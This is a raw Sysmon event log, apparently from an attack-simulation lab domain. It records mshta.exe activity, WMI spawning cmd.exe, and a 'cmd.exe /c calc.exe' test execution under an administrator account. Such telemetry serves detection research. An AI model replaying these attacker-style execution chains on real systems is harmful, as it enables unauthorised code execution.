15:16:57.704{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791813Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.704{732C744F-1517-600B-0500-00000000A301}6402204C:\Windows\system32\csrss.exe{732C744F-3269-6010-E3A2-00000000A301}2476C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000791812Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.704{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-3269-6010-E3A2-00000000A301}2476C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4 154100x8000000000000000791811Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.711{732C744F-3269-6010-E3A2-00000000A301}2476C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Execmd.exeC:\Windows\system32\ATTACKRANGE\Administrator{732C744F-17E1-600B-DAA7-130000000000}0x13a7da2HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 10341000x8000000000000000791810Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.688{732C744F-17DF-600B-9401-00000000A301}5084884C:\Windows\system32\csrss.exe{732C744F-3269-6010-E2A2-00000000A301}7240C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000791809Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.688{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791808Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.688{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791807Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.688{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791806Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.688{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791805Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.688{732C744F-17DF-600B-9401-00000000A301}5084884C:\Windows\system32\csrss.exe{732C744F-3269-6010-E1A2-00000000A301}5600C:\Windows\System32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000791804Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.688{732C744F-2806-600F-D682-00000000A301}66244848C:\Windows\explorer.exe{732C744F-3269-6010-E1A2-00000000A301}5600C:\Windows\System32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\SHELL32.dll+8d42f|C:\Windows\System32\SHELL32.dll+8d2bc|C:\Windows\System32\SHELL32.dll+6b47e|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000791803Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.688{732C744F-3269-6010-E1A2-00000000A301}5600C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\System32\cmd.exe" /c calc.exeC:\Windows\System32\ATTACKRANGE\Administrator{732C744F-17E1-600B-DAA7-130000000000}0x13a7da2HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exeC:\Windows\explorer.exe /NOUACCHECK 10341000x8000000000000000791802Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.641{732C744F-2806-600F-D682-00000000A301}66244904C:\Windows\explorer.exe{732C744F-3269-6010-E0A2-00000000A301}8116C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b14b5|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791801Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.641{732C744F-2806-600F-D682-00000000A301}66244904C:\Windows\explorer.exe{732C744F-3269-6010-E0A2-00000000A301}8116C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b13ce|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791800Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.641{732C744F-2806-600F-D682-00000000A301}66244904C:\Windows\explorer.exe{732C744F-3269-6010-E0A2-00000000A301}8116C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791799Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.641{732C744F-2806-600F-D682-00000000A301}66245660C:\Windows\explorer.exe{732C744F-3269-6010-E0A2-00000000A301}8116C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b14b5|C:\Windows\explorer.exe+1e03a|C:\Windows\explorer.exe+1e249|C:\Windows\explorer.exe+1df79|C:\Windows\explorer.exe+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791798Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.641{732C744F-2806-600F-D682-00000000A301}66245660C:\Windows\explorer.exe{732C744F-3269-6010-E0A2-00000000A301}8116C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b13ce|C:\Windows\explorer.exe+1e03a|C:\Windows\explorer.exe+1e249|C:\Windows\explorer.exe+1df79|C:\Windows\explorer.exe+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791797Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.641{732C744F-2806-600F-D682-00000000A301}66245660C:\Windows\explorer.exe{732C744F-3269-6010-E0A2-00000000A301}8116C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\explorer.exe+1e03a|C:\Windows\explorer.exe+1e249|C:\Windows\explorer.exe+1df79|C:\Windows\explorer.exe+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791796Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.641{732C744F-2806-600F-D682-00000000A301}66245660C:\Windows\explorer.exe{732C744F-3269-6010-E0A2-00000000A301}8116C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\explorer.exe+1f054|C:\Windows\explorer.exe+1f000|C:\Windows\explorer.exe+1dfec|C:\Windows\explorer.exe+1e249|C:\Windows\explorer.exe+1df79|C:\Windows\explorer.exe+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791795Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.626{732C744F-17E2-600B-A601-00000000A301}55845760C:\Windows\system32\taskhostw.exe{732C744F-3269-6010-E0A2-00000000A301}8116C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791794Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.626{732C744F-17E2-600B-A601-00000000A301}55845760C:\Windows\system32\taskhostw.exe{732C744F-3269-6010-E0A2-00000000A301}8116C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791793Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.626{732C744F-2806-600F-D682-00000000A301}66248088C:\Windows\explorer.exe{732C744F-3269-6010-E0A2-00000000A301}8116C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b0e30|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791792Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.626{732C744F-2806-600F-D682-00000000A301}66248088C:\Windows\explorer.exe{732C744F-3269-6010-E0A2-00000000A301}8116C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b0dc0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791791Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.626{732C744F-2806-600F-D682-00000000A301}66248088C:\Windows\explorer.exe{732C744F-3269-6010-E0A2-00000000A301}8116C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+97140|C:\Windows\System32\SHELL32.dll+b0dec|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791790Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.626{732C744F-2806-600F-D682-00000000A301}66248088C:\Windows\explorer.exe{732C744F-3269-6010-E0A2-00000000A301}8116C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791789Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.626{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-3269-6010-E0A2-00000000A301}8116C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791788Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.610{732C744F-1518-600B-0B00-00000000A301}8566876C:\Windows\system32\lsass.exe{732C744F-3269-6010-E0A2-00000000A301}8116C:\Windows\system32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791787Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.610{732C744F-1518-600B-0B00-00000000A301}8566876C:\Windows\system32\lsass.exe{732C744F-3269-6010-E0A2-00000000A301}8116C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791786Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.595{732C744F-151A-600B-1600-00000000A301}15281680C:\Windows\system32\svchost.exe{732C744F-3269-6010-E0A2-00000000A301}8116C:\Windows\system32\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791785Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.595{732C744F-151A-600B-1600-00000000A301}15281564C:\Windows\system32\svchost.exe{732C744F-3269-6010-E0A2-00000000A301}8116C:\Windows\system32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791784Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.532{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E0A2-00000000A301}8116C:\Windows\system32\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791783Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 